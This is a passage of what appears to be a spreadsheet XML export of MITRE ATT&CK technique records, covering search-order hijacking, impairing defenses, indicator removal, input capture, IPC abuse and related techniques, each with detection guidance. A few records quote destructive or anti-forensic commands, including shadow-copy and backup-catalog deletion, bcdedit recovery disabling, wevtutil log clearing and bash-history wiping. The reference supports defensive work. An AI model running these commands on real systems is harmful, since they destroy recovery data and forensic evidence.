    <s v="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quot;findstr,&quot; &quot;net,&quot; and &quot;python&quot;). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious._x000a__x000a_Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement."/>
    <s v="Windows"/>
    <s v="File: File Creation, File: File Modification, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1574"/>
    <s v="Stefan Kanthak"/>
    <m/>
    <s v="Application control"/>
    <m/>
  </r>
  <r>
    <s v="T1574.008"/>
    <x v="269"/>
    <s v="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_x000a__x000a_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_x000a__x000a_For example, &quot;example.exe&quot; runs &quot;cmd.exe&quot; with the command-line argument &lt;code&gt;net user&lt;/code&gt;. An adversary may place a program called &quot;net.exe&quot; within the same directory as example.exe, &quot;net.exe&quot; will be run instead of the Windows system utility net. In addition, if an adversary places a program called &quot;net.com&quot; in the same directory as &quot;net.exe&quot;, then &lt;code&gt;cmd.exe /C net user&lt;/code&gt; will execute &quot;net.com&quot; instead of &quot;net.exe&quot; due to the order of executable extensions defined under PATHEXT. (Citation: Microsoft Environment Property)_x000a__x000a_Search order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001)."/>
    <s v="https://attack.mitre.org/techniques/T1574/008"/>
    <d v="2020-03-13T00:00:00"/>
    <d v="2020-09-17T00:00:00"/>
    <n v="1"/>
    <x v="19"/>
    <s v="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quot;findstr,&quot; &quot;net,&quot; and &quot;python&quot;). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious._x000a__x000a_Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement._x000a_"/>
    <s v="Windows"/>
    <s v="File: File Creation, File: File Modification, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1574"/>
    <s v="Stefan Kanthak"/>
    <s v="Administrator, SYSTEM, User"/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1574.009"/>
    <x v="270"/>
    <s v="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_x000a__x000a_Service paths (Citation: Microsoft CurrentControlSet Services) and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., &lt;code&gt;C:\unsafe path with space\program.exe&lt;/code&gt; vs. &lt;code&gt;&quot;C:\safe path with space\program.exe&quot;&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_x000a__x000a_This technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process."/>
    <s v="https://attack.mitre.org/techniques/T1574/009"/>
    <d v="2020-03-13T00:00:00"/>
    <d v="2020-09-17T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="19"/>
    <s v="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quot;findstr,&quot; &quot;net,&quot; and &quot;python&quot;). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious._x000a__x000a_Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement."/>
    <s v="Windows"/>
    <s v="File: File Creation, File: File Modification, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1574"/>
    <s v="Stefan Kanthak"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1574.010"/>
    <x v="271"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1574/010"/>
    <d v="2020-03-12T00:00:00"/>
    <d v="2020-09-16T00:00:00"/>
    <n v="1"/>
    <x v="19"/>
    <s v="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_x000a__x000a_Look for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques. "/>
    <s v="Windows"/>
    <s v="File: File Creation, File: File Modification, Process: Process Creation, Service: Service Metadata"/>
    <b v="1"/>
    <s v="T1574"/>
    <s v="Stefan Kanthak; Travis Smith, Tripwire"/>
    <s v="Administrator, User"/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1574.011"/>
    <x v="272"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1574/011"/>
    <d v="2020-03-13T00:00:00"/>
    <d v="2020-09-16T00:00:00"/>
    <n v="1"/>
    <x v="19"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
    <s v="Windows"/>
    <s v="Command: Command Execution, Process: Process Creation, Service: Service Metadata, Windows Registry: Windows Registry Key Modification"/>
    <b v="1"/>
    <s v="T1574"/>
    <s v="Matthew Demaske, Adaptforward; Travis Smith, Tripwire"/>
    <s v="Administrator, User"/>
    <s v="Application control"/>
    <m/>
  </r>
  <r>
    <s v="T1562"/>
    <x v="273"/>
    <s v="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_x000a__x000a_Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components."/>
    <s v="https://attack.mitre.org/techniques/T1562"/>
    <d v="2020-02-21T00:00:00"/>
    <d v="2021-04-24T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="12"/>
    <s v="Monitor processes and command-line arguments to see if security tools or logging services are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools.  Lack of log events may be suspicious._x000a__x000a_Monitor environment variables and APIs that can be leveraged to disable security measures."/>
    <s v="Containers, IaaS, Linux, Office 365, Windows, macOS"/>
    <s v="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
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="Anti-virus, Digital Certificate Validation, File monitoring, Firewall, Host forensic analysis, Host intrusion prevention systems, Log analysis, Signature-based detection"/>
    <m/>
  </r>
  <r>
    <s v="T1562.008"/>
    <x v="274"/>
    <s v="An adversary may disable cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. _x000a__x000a_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s v="https://attack.mitre.org/techniques/T1562/008"/>
    <d v="2020-10-12T00:00:00"/>
    <d v="2021-03-15T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="12"/>
    <s v="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s v="IaaS"/>
    <s v="Cloud Service: Cloud Service Disable, Cloud Service: Cloud Service Modification"/>
    <b v="1"/>
    <s v="T1562"/>
    <s v="Alex Soler, AttackIQ; Ibrahim Ali Khan; Janantha Marasinghe; Matt Snyder, VMware; Prasad Somasamudram, McAfee; Sekhar Sarukkai, McAfee ; Syed Ummar Farooqh, McAfee"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1562.002"/>
    <x v="275"/>
    <s v="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_x000a__x000a_Adversaries may targeting system-wide logging or just that of a particular application. By disabling Windows event logging, adversaries can operate while leaving less evidence of a compromise behind."/>
    <s v="https://attack.mitre.org/techniques/T1562/002"/>
    <d v="2020-02-21T00:00:00"/>
    <d v="2020-03-29T00:00:00"/>
    <n v="1"/>
    <x v="12"/>
    <s v="Monitor processes and command-line arguments for commands that can be used to disable logging. Lack of event logs may be suspicious."/>
    <s v="Windows"/>
    <s v="Command: Command Execution, Sensor Health: Host Status"/>
    <b v="1"/>
    <s v="T1562"/>
    <m/>
    <m/>
    <s v="Log analysis"/>
    <m/>
  </r>
  <r>
    <s v="T1562.007"/>
    <x v="276"/>
    <s v="Adversaries may disable or modify a firewall within a cloud environment to bypass controls that limit access to cloud resources. Cloud firewalls are separate from system firewalls that are described in [Disable or Modify System Firewall](https://attack.mitre.org/techniques/T1562/004). _x000a__x000a_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_x000a__x000a_Modifying or disabling a cloud firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed."/>
    <s v="https://attack.mitre.org/techniques/T1562/007"/>
    <d v="2020-06-24T00:00:00"/>
    <d v="2021-03-08T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="12"/>
    <s v="Monitor cloud logs for modification or creation of new security groups or firewall rules."/>
    <s v="IaaS"/>
    <s v="Firewall: Firewall Disable, Firewall: Firewall Rule Modification"/>
    <b v="1"/>
    <s v="T1562"/>
    <s v="Expel"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1562.004"/>
    <x v="277"/>
    <s v="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_x000a__x000a_Modifying or disabling a system firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed. "/>
    <s v="https://attack.mitre.org/techniques/T1562/004"/>
    <d v="2020-02-21T00:00:00"/>
    <d v="2020-03-29T00:00:00"/>
    <n v="1"/>
    <x v="12"/>
    <s v="Monitor processes and command-line arguments to see if firewalls are disabled or modified. Monitor Registry edits to keys that manage firewalls."/>
    <s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, Firewall: Firewall Disable, Firewall: Firewall Rule Modification, Windows Registry: Windows Registry Key Modification"/>
    <b v="1"/>
    <s v="T1562"/>
    <m/>
    <m/>
    <s v="Firewall"/>
    <m/>
  </r>
  <r>
    <s v="T1562.001"/>
    <x v="278"/>
    <s v="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
    <s v="https://attack.mitre.org/techniques/T1562/001"/>
    <d v="2020-02-21T00:00:00"/>
    <d v="2021-04-19T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="12"/>
    <s v="Monitor processes and command-line arguments to see if security tools are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools. Lack of log events may be suspicious."/>
    <s v="Containers, IaaS, Linux, Windows, macOS"/>
    <s v="Command: Command Execution, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification"/>
    <b v="1"/>
    <s v="T1562"/>
    <s v="Gal Singer, @galsinger29, Team Nautilus Aqua Security; Nathaniel Quist, Palo Alto Networks; Ziv Karliner, @ziv_kr, Team Nautilus Aqua Security"/>
    <m/>
    <s v="Anti-virus, File monitoring, Host intrusion prevention systems, Log analysis, Signature-based detection"/>
    <m/>
  </r>
  <r>
    <s v="T1562.003"/>
    <x v="279"/>
    <s v="Adversaries may impair command history logging to hide commands they run on a compromised system. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done. _x000a__x000a_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_x000a__x000a_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quot;ignorespace&quot;. &lt;code&gt;HISTCONTROL&lt;/code&gt; can also be set to ignore duplicate commands by setting it to &quot;ignoredups&quot;. In some Linux systems, this is set by default to &quot;ignoreboth&quot; which covers both of the previous examples. This means that “ ls” will not be saved, but “ls” would be saved by history. Adversaries can abuse this to operate without leaving traces by simply prepending a space to all of their terminal commands._x000a__x000a_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s v="https://attack.mitre.org/techniques/T1562/003"/>
    <d v="2020-02-21T00:00:00"/>
    <d v="2021-04-24T00:00:00"/>
    <n v="2"/>
    <x v="12"/>
    <s v="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_x000a__x000a_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
    <s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, Sensor Health: Host Status"/>
    <b v="1"/>
    <s v="T1562"/>
    <s v="Emile Kenning, Sophos; Vikas Singh, Sophos"/>
    <m/>
    <s v="Host forensic analysis, Log analysis"/>
    <m/>
  </r>
  <r>
    <s v="T1562.006"/>
    <x v="280"/>
    <s v="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_x000a__x000a_ETW interruption can be achieved multiple ways, however most directly by defining conditions using the [PowerShell](https://attack.mitre.org/techniques/T1059/001) &lt;code&gt;Set-EtwTraceProvider&lt;/code&gt; cmdlet or by interfacing directly with the Registry to make alterations._x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1562/006"/>
    <d v="2020-03-19T00:00:00"/>
    <d v="2021-01-13T00:00:00"/>
    <n v="1"/>
    <x v="12"/>
    <s v="Detect lack of reported activity from a host sensor. Different methods of blocking may cause different disruptions in reporting. Systems may suddenly stop reporting all data or only certain kinds of data._x000a__x000a_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
    <s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, Sensor Health: Host Status, Windows Registry: Windows Registry Key Modification"/>
    <b v="1"/>
    <s v="T1562"/>
    <s v="Rob Smith"/>
    <m/>
    <s v="Anti-virus, Host intrusion prevention systems"/>
    <m/>
  </r>
  <r>
    <s v="T1525"/>
    <x v="281"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1525"/>
    <d v="2019-09-04T00:00:00"/>
    <d v="2021-04-12T00:00:00"/>
    <n v="2"/>
    <x v="3"/>
    <s v="Monitor interactions with images and containers by users to identify ones that are added or modified anomalously._x000a__x000a_In containerized environments, changes may be detectable by monitoring the Docker daemon logs or setting up and monitoring Kubernetes audit logs depending on registry configuration. "/>
    <s v="Containers, IaaS"/>
    <s v="Image: Image Creation, Image: Image Modification"/>
    <b v="0"/>
    <m/>
    <s v="Praetorian; Vishwas Manral, McAfee; Yossi Weizman, Azure Defender Research Team"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1070"/>
    <x v="282"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1070"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2021-04-24T00:00:00"/>
    <n v="1.2"/>
    <x v="12"/>
    <s v="File system monitoring may be used to detect improper deletion or modification of indicator files.  Events not stored on the file system may require different detection mechanisms."/>
    <s v="Containers, Linux, Windows, macOS"/>
    <s v="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
    <b v="0"/>
    <m/>
    <s v="Brad Geesaman, @bradgeesaman; Ed Williams, Trustwave, SpiderLabs"/>
    <m/>
    <s v="Anti-virus, Host intrusion prevention systems, Log analysis"/>
    <m/>
  </r>
  <r>
    <s v="T1070.003"/>
    <x v="283"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Adversaries may delete their commands from these logs by manually clearing the history (&lt;code&gt;history -c&lt;/code&gt;) or deleting the bash history file &lt;code&gt;rm ~/.bash_history&lt;/code&gt;._x000a__x000a_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_x000a__x000a_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_x000a__x000a_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s v="https://attack.mitre.org/techniques/T1070/003"/>
    <d v="2020-01-31T00:00:00"/>
    <d v="2020-10-16T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="12"/>
    <s v="User authentication, especially via remote terminal services like SSH, without new entries in that user's &lt;code&gt;~/.bash_history&lt;/code&gt; is suspicious. Additionally, the removal/clearing of the &lt;code&gt;~/.bash_history&lt;/code&gt; file can be an indicator of suspicious activity._x000a__x000a_Monitor for suspicious modifications or deletion of &lt;code&gt;ConsoleHost_history.txt&lt;/code&gt; and use of the &lt;code&gt;Clear-History&lt;/code&gt; command."/>
    <s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, File: File Deletion, File: File Modification"/>
    <b v="1"/>
    <s v="T1070"/>
    <s v="Emile Kenning, Sophos; Vikas Singh, Sophos"/>
    <m/>
    <s v="Host forensic analysis, Log analysis"/>
    <m/>
  </r>
  <r>
    <s v="T1070.002"/>
    <x v="284"/>
    <s v="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_x000a__x000a_* &lt;code&gt;/var/log/messages:&lt;/code&gt;: General and system-related messages_x000a_* &lt;code&gt;/var/log/secure&lt;/code&gt; or &lt;code&gt;/var/log/auth.log&lt;/code&gt;: Authentication logs_x000a_* &lt;code&gt;/var/log/utmp&lt;/code&gt; or &lt;code&gt;/var/log/wtmp&lt;/code&gt;: Login records_x000a_* &lt;code&gt;/var/log/kern.log&lt;/code&gt;: Kernel logs_x000a_* &lt;code&gt;/var/log/cron.log&lt;/code&gt;: Crond logs_x000a_* &lt;code&gt;/var/log/maillog&lt;/code&gt;: Mail server logs_x000a_* &lt;code&gt;/var/log/httpd/&lt;/code&gt;: Web server access and error logs_x000a_"/>
    <s v="https://attack.mitre.org/techniques/T1070/002"/>
    <d v="2020-01-28T00:00:00"/>
    <d v="2020-03-29T00:00:00"/>
    <n v="1"/>
    <x v="12"/>
    <s v="File system monitoring may be used to detect improper deletion or modification of indicator files. Also monitor for suspicious processes interacting with log files."/>
    <s v="Linux, macOS"/>
    <s v="Command: Command Execution, File: File Deletion, File: File Modification"/>
    <b v="1"/>
    <s v="T1070"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1070.001"/>
    <x v="285"/>
    <s v="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_x000a__x000a_The event logs can be cleared with the following utility commands:_x000a__x000a_* &lt;code&gt;wevtutil cl system&lt;/code&gt;_x000a_* &lt;code&gt;wevtutil cl application&lt;/code&gt;_x000a_* &lt;code&gt;wevtutil cl security&lt;/code&gt;_x000a__x000a_These logs may also be cleared through other mechanisms, such as the event viewer GUI or [PowerShell](https://attack.mitre.org/techniques/T1059/001)."/>
    <s v="https://attack.mitre.org/techniques/T1070/001"/>
    <d v="2020-01-28T00:00:00"/>
    <d v="2020-03-29T00:00:00"/>
    <n v="1"/>
    <x v="12"/>
    <s v="Deleting Windows event logs (via native binaries (Citation: Microsoft wevtutil Oct 2017), API functions (Citation: Microsoft EventLog.Clear), or [PowerShell](https://attack.mitre.org/techniques/T1059/001) (Citation: Microsoft Clear-EventLog)) may also generate an alterable event (Event ID 1102: &quot;The audit log was cleared&quot;)."/>
    <s v="Windows"/>
    <s v="Command: Command Execution, Process: OS API Execution"/>
    <b v="1"/>
    <s v="T1070"/>
    <m/>
    <m/>
    <s v="Anti Virus, Host Intrusion Prevention Systems, Log Analysis"/>
    <m/>
  </r>
  <r>
    <s v="T1070.004"/>
    <x v="286"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1070/004"/>
    <d v="2020-01-31T00:00:00"/>
    <d v="2020-03-29T00:00:00"/>
    <n v="1"/>
    <x v="12"/>
    <s v="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
    <s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, File: File Deletion"/>
    <b v="1"/>
    <s v="T1070"/>
    <s v="Walker Johnson"/>
    <m/>
    <s v="Host forensic analysis"/>
    <m/>
  </r>
  <r>
    <s v="T1070.005"/>
    <x v="287"/>
    <s v="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
    <s v="https://attack.mitre.org/techniques/T1070/005"/>
    <d v="2020-01-31T00:00:00"/>
    <d v="2021-02-09T00:00:00"/>
    <n v="1"/>
    <x v="12"/>
    <s v="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
    <s v="Windows"/>
    <s v="Command: Command Execution, Network Traffic: Network Traffic Content, Process: Process Creation, User Account: User Account Authentication"/>
    <b v="1"/>
    <s v="T1070"/>
    <m/>
    <m/>
    <s v="Host forensic analysis"/>
    <m/>
  </r>
  <r>
    <s v="T1070.006"/>
    <x v="288"/>
    <s v="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_x000a__x000a_Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)"/>
    <s v="https://attack.mitre.org/techniques/T1070/006"/>
    <d v="2020-01-31T00:00:00"/>
    <d v="2020-03-29T00:00:00"/>
    <n v="1"/>
    <x v="12"/>
    <s v="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
    <s v="Linux, Windows, macOS"/>
    <s v="File: File Metadata, File: File Modification"/>
    <b v="1"/>
    <s v="T1070"/>
    <s v="Romain Dumont, ESET"/>
    <m/>
    <s v="Host forensic analysis"/>
    <m/>
  </r>
  <r>
    <s v="T1202"/>
    <x v="289"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1202"/>
    <d v="2018-04-18T00:00:00"/>
    <d v="2020-06-20T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="12"/>
    <s v="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
    <s v="Windows"/>
    <s v="Command: Command Execution, Process: Process Creation"/>
    <b v="0"/>
    <m/>
    <s v="Matthew Demaske, Adaptforward"/>
    <m/>
    <s v="Application control, Application control by file name or path, Static File Analysis"/>
    <m/>
  </r>
  <r>
    <s v="T1105"/>
    <x v="290"/>
    <s v="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
    <s v="https://attack.mitre.org/techniques/T1105"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2020-03-20T00:00:00"/>
    <n v="2"/>
    <x v="6"/>
    <s v="Monitor for file creation and files transferred into the network. Unusual processes with external network connections creating files on-system may be suspicious. Use of utilities, such as FTP, that does not normally occur may also be suspicious.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File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow"/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1490"/>
    <x v="291"/>
    <s v="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_x000a__x000a_A number of native Windows utilities have been used by adversaries to disable or delete system recovery features:_x000a__x000a_* &lt;code&gt;vssadmin.exe&lt;/code&gt; can be used to delete all volume shadow copies on a system - &lt;code&gt;vssadmin.exe delete shadows /all /quiet&lt;/code&gt;_x000a_* [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - &lt;code&gt;wmic shadowcopy delete&lt;/code&gt;_x000a_* &lt;code&gt;wbadmin.exe&lt;/code&gt; can be used to delete the Windows Backup Catalog - &lt;code&gt;wbadmin.exe delete catalog -quiet&lt;/code&gt;_x000a_* &lt;code&gt;bcdedit.exe&lt;/code&gt; can be used to disable automatic Windows recovery features by modifying boot configuration data - &lt;code&gt;bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures &amp; bcdedit /set {default} recoveryenabled no&lt;/code&gt;"/>
    <s v="https://attack.mitre.org/techniques/T1490"/>
    <d v="2019-04-02T00:00:00"/>
    <d v="2020-07-14T00:00:00"/>
    <n v="1"/>
    <x v="1"/>
    <s v="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_x000a__x000a_Monitor the status of services involved in system recovery. Monitor the registry for changes associated with system recovery features (ex: the creation of &lt;code&gt;HKEY_CURRENT_USER\Software\Policies\Microsoft\PreviousVersions\DisableLocalPage&lt;/code&gt;)."/>
    <s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, File: File Deletion, Process: Process Creation, Service: Service Metadata, Windows Registry: Windows Registry Key Modification"/>
    <b v="0"/>
    <m/>
    <s v="Yonatan Gotlib, Deep Instinct"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1056"/>
    <x v="292"/>
    <s v="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
    <s v="https://attack.mitre.org/techniques/T1056"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2020-10-21T00:00:00"/>
    <n v="1.2"/>
    <x v="20"/>
    <s v="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
    <s v="Linux, Network, Windows, macOS"/>
    <s v="Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification"/>
    <b v="0"/>
    <m/>
    <s v="John Lambert, Microsoft Threat Intelligence Center"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1056.004"/>
    <x v="293"/>
    <s v="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_x000a__x000a_* **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)_x000a_* **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)_x000a_* **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)_x000a_"/>
    <s v="https://attack.mitre.org/techniques/T1056/004"/>
    <d v="2020-02-11T00:00:00"/>
    <d v="2020-11-10T00:00:00"/>
    <n v="1"/>
    <x v="20"/>
    <s v="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_x000a__x000a_Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity._x000a__x000a_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
    <s v="Windows"/>
    <s v="Process: OS API Execution, Process: Process Metadata"/>
    <b v="1"/>
    <s v="T1056"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1056.002"/>
    <x v="294"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1056/002"/>
    <d v="2020-02-11T00:00:00"/>
    <d v="2020-03-24T00:00:00"/>
    <n v="1"/>
    <x v="20"/>
    <s v="Monitor process execution for unusual programs as well as malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) that could be used to prompt users for credentials._x000a__x000a_Inspect and scrutinize input prompts for indicators of illegitimacy, such as non-traditional banners, text, timing, and/or sources."/>
    <s v="Windows, macOS"/>
    <s v="Process: Process Creation"/>
    <b v="1"/>
    <s v="T1056"/>
    <s v="Matthew Molyett, @s1air, Cisco Talos"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1056.001"/>
    <x v="295"/>
    <s v="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_x000a__x000a_Keylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes.(Citation: Adventures of a Keystroke) Some methods include:_x000a__x000a_* Hooking API callbacks used for processing keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), this focuses solely on API functions intended for processing keystroke data._x000a_* Reading raw keystroke data from the hardware buffer._x000a_* Windows Registry modifications._x000a_* Custom drivers._x000a_* [Modify System Image](https://attack.mitre.org/techniques/T1601) may provide adversaries with hooks into the operating system of network devices to read raw keystrokes for login sessions.(Citation: Cisco Blog Legacy Device Attacks) "/>
    <s v="https://attack.mitre.org/techniques/T1056/001"/>
    <d v="2020-02-11T00:00:00"/>
    <d v="2020-10-21T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="20"/>
    <s v="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
    <s v="Linux, Network, Windows, macOS"/>
    <s v="Driver: Driver Load, Process: OS API Execution, Windows Registry: Windows Registry Key Modification"/>
    <b v="1"/>
    <s v="T1056"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1056.003"/>
    <x v="296"/>
    <s v="Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service._x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1056/003"/>
    <d v="2020-02-11T00:00:00"/>
    <d v="2020-03-24T00:00:00"/>
    <n v="1"/>
    <x v="20"/>
    <s v="File monitoring may be used to detect changes to files in the Web directory for organization login pages that do not match with authorized updates to the Web server's content."/>
    <s v="Linux, Windows, macOS"/>
    <s v="File: File Modification"/>
    <b v="1"/>
    <s v="T1056"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1559"/>
    <x v="297"/>
    <s v="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_x000a__x000a_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s v="https://attack.mitre.org/techniques/T1559"/>
    <d v="2020-02-12T00:00:00"/>
    <d v="2020-03-28T00:00:00"/>
    <n v="1"/>
    <x v="13"/>
    <s v="Monitor for strings in files/commands, loaded DLLs/libraries, or spawned processes that are associated with abuse of IPC mechanisms."/>
    <s v="Windows"/>
    <s v="Module: Module Load, Process: Process Creation, Script: Script Execution"/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1559.001"/>
    <x v="298"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1559/001"/>
    <d v="2020-02-12T00:00:00"/>
    <d v="2020-03-28T00:00:00"/>
    <n v="1"/>
    <x v="13"/>
    <s v="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_x000a__x000a_Monitor for spawning of processes associated with COM objects, especially those invoked by a user different than the one currently logged on. "/>
    <s v="Windows"/>
    <s v="Module: Module Load, Process: Process Creation, Script: Script Execution"/>
    <b v="1"/>
    <s v="T1559"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1559.002"/>
    <x v="299"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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s v="https://attack.mitre.org/techniques/T1559/002"/>
    <d v="2020-02-12T00:00:00"/>
    <d v="2020-03-28T00:00:00"/>
    <n v="1"/>
    <x v="13"/>
    <s v="Monitor processes for abnormal behavior indicative of DDE abuse, such as Microsoft Office applications loading DLLs and other modules not typically associated with the application or these applications spawning unusual processes (such as cmd.exe)._x000a__x000a_OLE and Office Open XML files can be scanned for ‘DDEAUTO', ‘DDE’, and other strings indicative of DDE execution.(Citation: NVisio Labs DDE Detection Oct 2017)"/>
    <s v="Windows"/>
    <s v="Module: Module Load, Process: Process Creation, Script: Script Execution"/>
    <b v="1"/>
    <s v="T1559"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1534"/>
    <x v="300"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1534"/>
    <d v="2019-09-04T00:00:00"/>
    <d v="2021-04-14T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="17"/>
    <s v="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s v="Google Workspace, Linux, Office 365, SaaS, Windows, macOS"/>
    <s v="Application Log: Application Log Content, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow"/>
    <b v="0"/>
    <m/>
    <s v="Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC); Tim MalcomVetter"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1570"/>
    <x v="301"/>
    <s v="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
    <s v="https://attack.mitre.org/techniques/T1570"/>
    <d v="2020-03-11T00:00:00"/>
    <d v="2020-03-23T00:00:00"/>
    <n v="1"/>
    <x v="17"/>
    <s v="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
    <s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, File: File Creation, File: File Metadata, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation"/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1185"/>
    <x v="302"/>
    <s v="Adversaries can take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify behavior, and intercept information as part of various man in the browser techniques. (Citation: Wikipedia Man in the Browser)_x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1185"/>
    <d v="2018-01-16T00:00:00"/>
    <d v="2021-02-09T00:00:00"/>
    <n v="1"/>
    <x v="7"/>
    <s v="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
    <s v="Windows"/>
    <s v="Logon Session: Logon Session Creation, Process: Process Access"/>
    <b v="0"/>
    <m/>
    <s v="Justin Warner, ICEBRG"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1557"/>
    <x v="303"/>
    <s v="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_x000a__x000a_Adversaries may leverage the MiTM position to attempt to modify traffic, such as in [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). Adversaries can also stop traffic from flowing to the appropriate destination, causing denial of service."/>
    <s v="https://attack.mitre.org/techniques/T1557"/>
    <d v="2020-02-11T00:00:00"/>
    <d v="2020-10-16T00:00:00"/>
